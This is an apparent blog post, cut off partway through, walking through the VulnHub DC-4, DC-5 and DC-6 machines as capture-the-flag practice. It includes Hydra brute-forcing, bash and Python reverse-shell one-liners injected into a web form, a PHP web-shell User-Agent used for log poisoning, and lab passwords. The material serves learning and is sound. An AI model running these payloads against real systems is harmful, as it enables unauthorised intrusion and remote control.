{"id":292,"date":"2025-07-15T13:27:50","date_gmt":"2025-07-15T13:27:50","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=292"},"modified":"2025-07-17T06:14:42","modified_gmt":"2025-07-17T06:14:42","slug":"ctf-dc-4-dc-5-dc-6-intermediate","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=292","title":{"rendered":"CTF: DC-4, DC-5, DC-6 (intermediate)"},"content":{"rendered":"\n<p>As part of my CEH Practical prep, I\u2019m sharpening my enumeration and exploitation workflow using realistic boot2root machines. The <a>DC series<\/a> on VulnHub is perfect for this: local, legal, and logically progressive. In this post, I\u2019ll walk through <strong>DC-4<\/strong>, <strong>DC-5, DC-6<\/strong> \u2014 there are more web-focused VMs in the series.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">DC-4<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration<\/h2>\n\n\n\n<p>Let\u2019s start with a full Nmap scan:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-9f26c14e01b6031e72f46154343dfd40\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Downloads]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn 10.0.2.19\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-09 12:01 EDT\nNmap scan report for 10.0.2.19\nHost is up (0.00095s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)\n|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)\n|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)\n80\/tcp open  http    nginx 1.15.10\n|_http-server-header: nginx\/1.15.10\n|_http-title: System Tools\nMAC Address: 08:00:27:53:29:29 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 
- 4.14, Linux 3.8 - 3.16\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.95 ms 10.0.2.19\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 22.26 seconds<\/code><\/pre>\n\n\n\n<p>Only SSH and HTTP open. Let\u2019s hit the web server first.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Webserver (port 80)<\/h2>\n\n\n\n<p>The root page was just a login form. Time to go down the usual rabbit hole.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ran <code>gobuster<\/code> \u2013 nothing useful beyond <code>\/images<\/code> and <code>\/css<\/code>, both forbidden.<\/li>\n\n\n\n<li>Tried <code>robots.txt<\/code>, path traversal, SQLi, null bytes\u2026 even <code>nginxpwner<\/code>. Nada.<\/li>\n\n\n\n<li>Eventually, I decided to YOLO it with Hydra:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-1b8fad8acf24b2bdcd5c92494c11a6c5\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Documents\/tools\/nginxpwner]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 10.0.2.19 http-post-form \"\/login.php:username=^USER^&amp;password=^PASS^:H=504\" -V\n\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 123456\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 12345\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 123456789\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: password\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: princess\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 1234567\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: rockyou\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 12345678\n&#91;80]&#91;http-post-form] 
host: 10.0.2.19   login: admin   password: lovely\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: iloveyou\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: monkey\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: abc123\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: nicole\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: daniel\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: babygirl\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: jessica<\/code><\/pre>\n\n\n\n<p>At first, I thought it was a joke \u2014 but they were all valid logins. Even better, using Burp and filtering by length, I found several more:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-1024x340.png\" alt=\"\" class=\"wp-image-293\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-1024x340.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-300x100.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-768x255.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24.png 1268w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Initial Access<\/h2>\n\n\n\n<p>Regardless of which credentials I used, I ended up here:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"887\" height=\"315\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25.png\" alt=\"\" class=\"wp-image-294\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25.png 887w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25-300x107.png 300w, 
https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25-768x273.png 768w\" sizes=\"auto, (max-width: 887px) 100vw, 887px\" \/><\/figure>\n\n\n\n<p>Intercepting this with Burp showed we could tamper with the command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"516\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-1024x516.png\" alt=\"\" class=\"wp-image-296\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-1024x516.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-300x151.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-768x387.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26.png 1507w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"528\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-1024x528.png\" alt=\"\" class=\"wp-image-297\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-1024x528.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-300x155.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-768x396.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27.png 1510w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Attempt 1<\/strong>: Raw Bash Reverse Shell<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-41c836d788d2b64a9d1caaff361f503e\"><code>radio=bash+-i+>&amp;+\/dev\/tcp\/10.0.2.5\/4444+0>&amp;1&amp;submit=Run<\/code><\/pre>\n\n\n\n<p>Failed: an unencoded <code>&amp;<\/code> in a form body terminates the parameter, so the server only received the part of the command before it (<code>bash -i ><\/code>) and the rest became junk parameters.<\/p>\n\n\n\n<p><strong>Attempt 2<\/strong>: Base64 payload<\/p>\n\n\n\n<pre 
class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-270245a0dc1c8026c53fc6e2b8df3420\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Documents\/tools\/nginxpwner]\n\u2514\u2500$ echo \"bash -i >&amp; \/dev\/tcp\/10.0.2.5\/4444 0>&amp;1\" | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNS80NDQ0IDA+JjEK\n\nOn the request:\nradio=echo+YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNS80NDQ0IDA+JjEK|base64+-d|bash&amp;submit=Run<\/code><\/pre>\n\n\n\n<p><strong>Final shot<\/strong>: Python reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a7e617f6fbd363d5d2e4533c102ffc61\"><code>radio=python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.2.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(&#91;\"\/bin\/sh\",\"-i\"]);'&amp;submit=Run<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"449\" height=\"112\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29.png\" alt=\"\" class=\"wp-image-299\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29.png 449w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29-300x75.png 300w\" sizes=\"auto, (max-width: 449px) 100vw, 449px\" \/><\/figure>\n\n\n\n<p>Reverse shell landed as <code>www-data<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Escalating privileges<\/h2>\n\n\n\n<p>After looking around, we\u2019ve got a user called <code>jim<\/code> with the following files:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a9fcd49a19134712a9d5196cb79671d1\"><code>www-data@dc-4:\/home\/jim$ ls -la\ndrwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups\n-rw------- 1 jim  jim   528 Apr  6  2019 mbox\n-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh\nwww-data@dc-4:\/home\/jim$ 
cat test.sh \n#!\/bin\/bash\nfor i in {1..5}\ndo\n sleep 1\n echo \"Learn bash they said.\"\n sleep 1\n echo \"Bash is good they said.\"\ndone\n echo \"But I'd rather bash my head against a brick wall.\"\nwww-data@dc-4:\/home\/jim$ cd backups\/\nwww-data@dc-4:\/home\/jim\/backups$ ls -la\ntotal 12\ndrwxr-xr-x 2 jim jim 4096 Apr  7  2019 .\ndrwxr-xr-x 3 jim jim 4096 Apr  7  2019 ..\n-rw-r--r-- 1 jim jim 2047 Apr  7  2019 old-passwords.bak<\/code><\/pre>\n\n\n\n<p>While the <code>test.sh<\/code> script was amusing (its SUID bit is a red herring: Linux ignores setuid on interpreted scripts), <code>old-passwords.bak<\/code> looked far more promising. So I pulled it back to my machine and used it as a Hydra wordlist against SSH for <code>jim<\/code>.<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-aacb6d80a7b0280d64e5b6118f55de93\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Downloads\/ctf\/dc-4]\n\u2514\u2500$ hydra -l jim -P old-passwords.bak ssh:\/\/10.0.2.19                \n\n&#91;22]&#91;ssh] host: 10.0.2.19   login: jim   password: jibril04\n1 of 1 target successfully completed, 1 valid password found\n<\/code><\/pre>\n\n\n\n<p>After some initial digging, I didn\u2019t uncover anything useful \u2014 but running LinPEAS revealed the following:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"761\" height=\"98\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30.png\" alt=\"\" class=\"wp-image-300\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30.png 761w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30-300x39.png 300w\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" \/><\/figure>\n\n\n\n<p>The email contained the following information:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-5f66a5dbb745763d70aa410e00378a43\"><code>jim@dc-4:\/var\/mail$ cat jim \nFrom charles@dc-4 Sat Apr 06 21:15:46 2019\nReturn-path: 
&lt;charles@dc-4>\nEnvelope-to: jim@dc-4\nDelivery-date: Sat, 06 Apr 2019 21:15:46 +1000\nReceived: from charles by dc-4 with local (Exim 4.89)\n        (envelope-from &lt;charles@dc-4>)\n        id 1hCjIX-0000kO-Qt\n        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000\nTo: jim@dc-4\nSubject: Holidays\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=\"UTF-8\"\nContent-Transfer-Encoding: 8bit\nMessage-Id: &lt;E1hCjIX-0000kO-Qt@dc-4>\nFrom: Charles &lt;charles@dc-4>\nDate: Sat, 06 Apr 2019 21:15:45 +1000\nStatus: O\n\nHi Jim,\n\nI'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.\n\nPassword is:  ^xHhA&amp;hvim0y\n\nSee ya,\nCharles<\/code><\/pre>\n\n\n\n<p>How kind of Charles to share his password \u2014 after switching to his user and running <code>sudo -l<\/code>, things got interesting.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"873\" height=\"95\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31.png\" alt=\"\" class=\"wp-image-301\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31.png 873w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31-300x33.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31-768x84.png 768w\" sizes=\"auto, (max-width: 873px) 100vw, 873px\" \/><\/figure>\n\n\n\n<p>After looking into privilege escalation with <code>teehee<\/code> (which turns out to be a modified version of <code>tee<\/code>), I came across this method: <a href=\"https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/sudo\/sudo-tee-privilege-escalation\/\">Sudo Tee Privilege Escalation | Exploit Notes<\/a><\/p>\n\n\n\n<p>And just like that \u2014 root access achieved.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"961\" height=\"620\" 
src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32.png\" alt=\"\" class=\"wp-image-302\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32.png 961w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32-300x194.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32-768x495.png 768w\" sizes=\"auto, (max-width: 961px) 100vw, 961px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">DC-5<\/h1>\n\n\n\n<p>The full Nmap scan showed HTTP plus rpcbind and its status service, and no SSH this time:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-cb6c98309d04cf44e0ddfe8e1d42a243\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn 10.0.2.20\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-09 15:01 EDT\nNmap scan report for 10.0.2.20\nHost is up (0.00076s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT      STATE SERVICE VERSION\n80\/tcp    open  http    nginx 1.6.2\n|_http-server-header: nginx\/1.6.2\n|_http-title: Welcome\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          34447\/udp6  status\n|   100024  1          37844\/udp   status\n|   100024  1          47341\/tcp6  status\n|_  100024  1          55485\/tcp   status\n55485\/tcp open  status  1 (RPC #100024)\nMAC Address: 08:00:27:E2:43:20 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.75 ms 10.0.2.20\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 34.51 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (port 80)<\/h2>\n\n\n\n<p>The website on port 80 looked like a basic template with fake-looking content \u2014 but there was a <strong>contact form<\/strong>. After submitting some data, it redirected me to a new URL, which looked dynamic and potentially injectable.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"708\" height=\"52\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34.png\" alt=\"\" class=\"wp-image-305\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34.png 708w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34-300x22.png 300w\" sizes=\"auto, (max-width: 708px) 100vw, 708px\" \/><\/figure>\n\n\n\n<p>Naturally, I tested it for <strong>LFI<\/strong> (Local File Inclusion).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"359\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-1024x359.png\" alt=\"\" class=\"wp-image-306\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-1024x359.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-300x105.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-768x270.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33.png 1356w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Local File Inclusion &amp; Log Poisoning<\/h2>\n\n\n\n<p>Turns out, the LFI worked. Although browsing files wasn\u2019t super practical, I did manage to access the <strong>nginx logs<\/strong>. From there, AI nudged me toward <strong>log poisoning<\/strong> \u2014 a classic trick. 
To test it, I sent a malicious User-Agent string containing PHP code:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-f6cd323f9c25992213c36c2eaaef00c4\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ curl -A \"&lt;?php system(\\$_GET&#91;'cmd']); ?>\" http:\/\/10.0.2.22<\/code><\/pre>\n\n\n\n<p>After that, I used the LFI to include the poisoned log file and execute commands via <code>cmd=<\/code> in the URL.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"377\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-1024x377.png\" alt=\"\" class=\"wp-image-307\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-1024x377.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-300x110.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-768x283.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35.png 1234w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>With the log successfully poisoned, I went for a reverse shell:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a1e6264c871bd19d2bf175b2d779af72\"><code>bash -c 'bash -i >&amp; \/dev\/tcp\/10.0.2.5\/4444 0>&amp;1'\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.2.5\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(&#91;\"\/bin\/sh\",\"-i\"]);'<\/code><\/pre>\n\n\n\n<p>Despite the log poisoning trick working initially and giving me command execution, I just couldn&#8217;t get a reverse shell to stick. 
I tried multiple payloads \u2014 from Bash to Python to Netcat \u2014 tweaking encodings, changing IPs and ports, even checking if outbound connections were being blocked\u2026 but nothing.<\/p>\n\n\n\n<p>It seemed like the webserver only executed the payload once, and after that, the log file stopped behaving like PHP. Maybe it was being cached or sanitized after the first hit. Either way, nothing I tried after that would trigger execution again. At some point, I realized I was spending more time trying to force a shell than it was worth \u2014 especially for a challenge box. So yeah\u2026 this one beat me (for now \ud83d\ude24).<\/p>\n\n\n\n<p>Sometimes walking away is better than going down a rabbit hole. On to the next!<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">DC-6<\/h1>\n\n\n\n<p>Started this one off with the usual full port scan:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-c5b18f0014192d50844986f82858fd5d\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn wordy    \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-10 06:47 EDT\nNmap scan report for wordy (10.0.2.24)\nHost is up (0.00057s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)\n|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)\n|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)\n80\/tcp open  http    Apache httpd 2.4.25 ((Debian))\n|_http-generator: WordPress 5.1.1\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Wordy &amp;#8211; Just another WordPress site\nMAC Address: 08:00:27:30:64:E1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: 
Linux 3.2 - 4.14\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.57 ms wordy (10.0.2.24)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 21.16 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (port 80)<\/h2>\n\n\n\n<p>The website looked like a fresh WordPress install with the classic &#8220;twentyseventeen&#8221; theme. I ran <code>gobuster<\/code> to confirm some default paths and then used <code>wpscan<\/code> to dig deeper. No vulnerable plugins turned up, but the theme version (twentyseventeen v2.1) <em>did<\/em> have a stored XSS vulnerability: <strong>CVE-2023-5162<\/strong> \u2014 sadly, this requires authentication to exploit. So the next step: enumerate users.<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-f1eecafdec66b03d90bb0f6454afb497\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ wpscan --url 'http:\/\/wordy' --enumerate u\n\n&#91;i] User(s) Identified:\n\n&#91;+] admin\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/wordy\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n&#91;+] graham\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] mark\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] sarah\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] jens\n | Found By: Author Id 
Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)<\/code><\/pre>\n\n\n\n<p>The VulnHub description hinted that we shouldn\u2019t wait \u201c5 years\u201d and gave us a command to speed things up \u2014 a clear nudge toward password spraying or bruteforcing:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"975\" height=\"110\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36.png\" alt=\"\" class=\"wp-image-309\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36.png 975w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36-300x34.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36-768x87.png 768w\" sizes=\"auto, (max-width: 975px) 100vw, 975px\" \/><\/figure>\n\n\n\n<p>Eventually, I was able to log in with limited permissions under a helpdesk-style account. No admin dashboard, no plugin editing \u2014 just basic access. 
But something interesting <em>did<\/em> stand out: an installed plugin, &#8216;Plainview Activity Monitor&#8217;.<\/p>\n\n\n\n<p>Some quick research turned up a known exploit: <a href=\"https:\/\/www.exploit-db.com\/exploits\/50110\">WordPress Plugin Plainview Activity Monitor 20161228 &#8211; Remote Code Execution (RCE) (Authenticated) (2) &#8211; PHP webapps Exploit<\/a>. After running it, we got a shell:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"570\" height=\"248\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37.png\" alt=\"\" class=\"wp-image-310\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37.png 570w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37-300x131.png 300w\" sizes=\"auto, (max-width: 570px) 100vw, 570px\" \/><\/figure>\n\n\n\n<p>While snooping around with a somewhat shaky shell, I stumbled across this:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-1e83241c27d6ef73f80d373470b4c910\"><code>www-data@wordy  cat \/home\/mark\/stuff\/things-to-do.txt\nThings to do:\n- Restore full functionality for the hyperdrive (need to speak to Jens)\n- Buy present for Sarah's farewell party\n- Add new user: graham - GSo7isUM1D4 - done\n- Apply for the OSCP course\n- Buy new laptop for Sarah's replacement<\/code><\/pre>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-f09620df453befff9b6c7644ef63cee8\">Used those creds to SSH into the machine as <code>graham<\/code>. 
Privileges were still limited, but a <code>sudo -l<\/code> showed something interesting:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"873\" height=\"146\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38.png\" alt=\"\" class=\"wp-image-311\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38.png 873w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38-300x50.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38-768x128.png 768w\" sizes=\"auto, (max-width: 873px) 100vw, 873px\" \/><\/figure>\n\n\n\n<p>We also have write permission on that file, so we can simply append a reverse shell payload like this and trigger it through <code>sudo<\/code>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"223\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-1024x223.png\" alt=\"\" class=\"wp-image-312\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-1024x223.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-300x65.png 300w, 